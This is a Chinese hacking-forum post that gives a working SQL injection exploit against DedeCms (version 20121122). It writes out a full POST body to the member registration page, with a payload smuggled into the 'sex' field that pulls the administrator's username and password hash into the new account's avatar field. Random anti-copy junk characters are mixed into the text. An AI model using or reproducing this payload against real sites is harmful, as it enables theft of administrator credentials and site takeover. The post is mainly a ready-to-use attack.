找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2109|回复: 0
打印 上一主题 下一主题

DedeCms SQL注射漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-5 10:03:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
dedecms版本 20121122  G9 c& }4 v7 x. s+ p) e% b

6 L1 f; U7 H4 X, I% m; c8 @需要magic_quotes_gpc=Off" ^; z# b+ d- w: Y: d3 n
- f( T% P# r6 ^* {0 V! c$ q7 B. ]( v5 W
应该是没有什么大危害的漏洞.6 R8 a% U( S; A2 O) n8 p7 }
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
& @2 u; [/ ^5 ^" b; e! q
$ t5 ]: Z& }  Z  s% V# h是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.& g! a% k# [! A3 Q
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
0 v+ `9 v1 R" M
1 U8 R/ X5 B+ Y) K+ _http:///de/member/reg_new.php
) r7 x% G, K% c  A% y. i+ f. X. N. Q$ A: g
POST. ]2 B! `6 m+ T' v

4 O. k7 d% N& r# p# Odopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
* C7 W- h; N; g8 N$ G% _
3 L: S) j9 n- _/ P5 x成功注册后,头像处里面有好玩的信息.
) Z, g/ n& |3 q6 ^$ O5 N
" m, ^9 v' ?. ?2 V0 }6 ~  }7 W4 u( `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表